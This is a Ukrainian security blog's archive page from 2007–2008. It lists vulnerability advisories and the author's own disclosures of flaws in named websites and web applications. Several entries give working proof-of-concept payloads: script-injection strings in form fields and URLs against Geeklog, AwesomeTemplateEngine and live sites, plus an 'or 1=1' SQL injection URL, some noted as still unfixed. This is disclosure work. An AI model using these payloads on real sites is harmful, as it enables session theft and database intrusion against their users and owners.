Архів для категорії 'Уразливості'

Добірка уразливостей

17:41 07.01.2008

В даній добірці уразливості в веб додатках:

  • rPSA-2007-0183-1 lighttpd (деталі)
  • Fizzle Firefox Extension Vulnerability (деталі)
  • xcms all version arbitrary code execution (деталі)
  • Neuron News 1.0 Local file inclusion (index.php) (деталі)
  • JSPWiki Multiple Vulnerabilities (деталі)
  • FlatNuke Arbitrary Command Inclusion (деталі)
  • Nuke Mobile Entartainment Local File Inclusion (деталі)
  • Multiple PHP remote file inclusion vulnerabilities in Jinzora Media Jukebox (деталі)
  • Переповнення буфера в 3CTftpSvc TFTP Server (деталі)
  • Multiple PHP remote file inclusion vulnerabilities in Irokez CMS (деталі)
  • Vulnerability in Fishyshoop 0.930 (деталі)
  • SQL-ін’єкція в PHP-Nuke (деталі)
  • Міжсайтовий скриптінг в b2evolution (деталі)
  • PHP remote file inclusion vulnerability in Ciberia Content Federator 1.0 (деталі)
  • Vulnerability in acFTP 1.5 (деталі)

Уразливості в Geeklog

23:53 06.01.2008

Ще у лютому, 09.02.2007, я знайшов Cross-Site Scripting уразливості в движку Geeklog. Про що найближчим часом сповіщу розробникам.

Дані уразливості я виявив на ftpsearch.com.ua, який використовує цей движок. Хоча я і звернув увагу, що на сайті використовується Geeklog, але тоді не записав це собі. І от лише сьогодні, коли я оприлюднив деталі уразливостей на ftpsearch.com.ua, я знову звернув увагу, що на сайті використовується цей движок. Про уразливості в якому я і вирішив повідомити.

XSS:

POST запит на http://site/profiles.php?sid=1&what=emailstory:

"><script>alert(document.cookie)</script>В полях: Отправитель, Адрес отправителя, Получатель, Адрес получателя.

</textarea><script>alert(document.cookie)</script>В полі: Короткое сообщение.

Уразливості на ftpsearch.com.ua

19:40 06.01.2008

08.08.2007

У лютому, 09.02.2007 (а також додатково сьогодні), я знайшов Cross-Site Scripting уразливості на проекті ftpsearch.com.ua. Про що найближчим часом сповіщу адміністрацію проекту.

Детальна інформація про уразливості з’явиться пізніше.

06.01.2008

XSS:

http://ftpsearch.com.ua

POST запит на сторінці http://ftpsearch.com.ua/profiles.php?
sid=20070808&what=emailstory:

"><script>alert(document.cookie)</script>В полях: Отправитель, Адрес отправителя, Получатель, Адрес получателя.

</textarea><script>alert(document.cookie)</script>В полі: Короткое сообщение.

http://i.ftpsearch.com.ua

http://google.ftpsearch.com.ua

Дані уразливості досі не виправлені.

Уразливості на livejournal.com

23:53 05.01.2008

У грудні, 27.12.2007, я знайшов дві Cross-Site Scripting уразливості на http://livejournal.com - популярному проекті LiveJournal (ЖЖ). Котрі пропонуються вашій увазі.

XSS:

Уразливості в файлі http://www.livejournal.com/preview/entry.bml.

livejournal.com XSS.html

livejournal.com XSS2.html

Розробникам LiveJournal потрібно більше слідкувати за безпекою свого проекту.

Добірка уразливостей

16:22 05.01.2008

В даній добірці уразливості в веб додатках:

  • Multiple PHP remote file inclusion vulnerabilities in Harpia CMS (деталі)
  • Command execution vulnerability in SCart 2.0 (деталі)
  • Variable extract vulnerability in Apache Stats (деталі)
  • Multiple PHP remote file inclusion vulnerabilities in TagIt! Tagboard (деталі)
  • PHP remote file inclusion vulnerability in TagIt! Tagboard (деталі)
  • SQL injection vulnerability in PollMentor 2.0 (деталі)
  • Buffer overflow in lighttpd (деталі)
  • Декілька уразливостей в PostgreSQL (деталі)
  • Vulnerability in phpProfiles (деталі)
  • Vulnerability in phpProfiles (деталі)
  • Multiple vulnerabilities in Sun Java Development Kit (JDK), Java Runtime Environment (JRE) and Java System Development Kit (SDK) (деталі)
  • SQL-ін’єкція в ClickContact (деталі)
  • Multiple cross-site scripting vulnerabilities in PWP Technologies The Classified Ad System (деталі)
  • Multiple cross-site scripting (XSS) vulnerabilities in PHP Live! (деталі)
  • Обхід аутентифікації та SQL-ін’єкція в SimpleBlog (деталі)

Уразливості на www.complex.lviv.ua

20:25 04.01.2008

04.08.2007

У лютому, 08.02.2007, я знайшов Full path disclosure та Cross-Site Scripting уразливості на проекті www.complex.lviv.ua (інтернет-магазин). Про що найближчим часом сповіщу адміністрацію проекту. Котрий розробили ті ж люди, що і auction.ua, про уразливість в якому я вже писав.

Детальна інформація про уразливості з’явиться пізніше.

04.01.2008

Full path disclosure:

http://www.complex.lviv.ua/comp/index.php?check1=pr&form_pidp=&name_pidpr=&index=&city=&adress=&surname=&name=&fathername=&kod=&phone=&mail=&rahunok=test

XSS:

Дані уразливості досі не виправлені. Що є звичайною ситуацією для даних розробників (халатне відношення до безпеки вони демонструють і на auction.ua).

Добірка уразливостей

16:30 03.01.2008

В даній добірці уразливості в веб додатках:

  • DoS Vulnerability in Konqueror 3.5.7 (деталі)
  • nabopoll 1.2 (survey.inc.php path) Remote File Include Vulnerability (деталі)
  • ZebraFeeds 1.0 (zf_path) Remote File Include Vulnerabilities (деталі)
  • XSS in [Calendar Express 2 ] (деталі)
  • XSS in [deskpro.com v1.1.0 ] (деталі)
  • Vulnerability in MOHA Chat (деталі)
  • Cross-site scripting (XSS) vulnerability in @Mail (деталі)
  • New links2 packages fix arbitrary shell command execution (деталі)
  • Пустий пароль для входу в WebAdmin в MailEnable (деталі)
  • Multiple PHP remote file inclusion vulnerabilities in phpProfiles (деталі)
  • Cross-site request forgery (CSRF) vulnerability in urlobox in MKPortal (деталі)
  • Vulnerability in Sun Java Development Kit (JDK), Java Runtime Environment (JRE) and Java System Development Kit (SDK) (деталі)
  • Міжсайтовий скриптінг в TikiWiki (деталі)
  • Обхід каталогу в JBoss DeploymentFileRepository (деталі)
  • Міжсайтовий скриптінг і SQL-ін’єкція в ClickGallery (деталі)

Cross-Site Scripting уразливості в AwesomeTemplateEngine

23:51 02.01.2008

В жовтні, 31.10.2007, я знайшов Cross-Site Scripting уразливості в AwesomeTemplateEngine.

Уразливості в файлі example_template.php в параметрах data[title], data[message], data[table][1][item], data[table][1][url] та data[poweredby]. Атака можлива при включених register globals.

XSS:

http://site/templates/example_template.php?data[title]=%3C/title%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E
http://site/templates/example_template.php?data[message]=%3Cscript%3Ealert(document.cookie)%3C/script%3E
http://site/templates/example_template.php?data[table][1][item]=%3Cscript%3Ealert(document.cookie)%3C/script%3E
http://site/templates/example_template.php?data[table][1][url]=%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E
http://site/templates/example_template.php?data[poweredby]=%3Cscript%3Ealert(document.cookie)%3C/script%3E

Уразливості на miranda.org.ua

19:22 02.01.2008

29.07.2007

У лютому, 05.02.2007, я знайшов Cross-Site Scripting, SQL Injection та Full path disclosure уразливості на проекті http://miranda.org.ua. Про що найближчим часом сповіщу адміністрацію проекту.

Детальна інформація про уразливості з’явиться пізніше.

02.01.2008

XSS:

SQL Injection:

http://miranda.org.ua/plugins/1%20or%201=1/*

Full path disclosure:

http://miranda.org.ua/index.php?name=1 (виправлена)

Частина уразливостей досі не виправлена.

Святкова уразливість на jokesland.net.ru

22:47 31.12.2007

В зв’язку з Новим Роком, що скоро наступить, пропоную вам два цікавих поздоровлення в якості невеличкого подарунку ;-) .

Поздоровлення №1

Поздоровлення №2

А також повідомляю, що 25.12.2007, я знайшов Cross-Site Scripting уразливість на проекті jokesland.net.ru. Тому самому, де і знаходиться це веселе новорічне поздоровлення :-) .

XSS: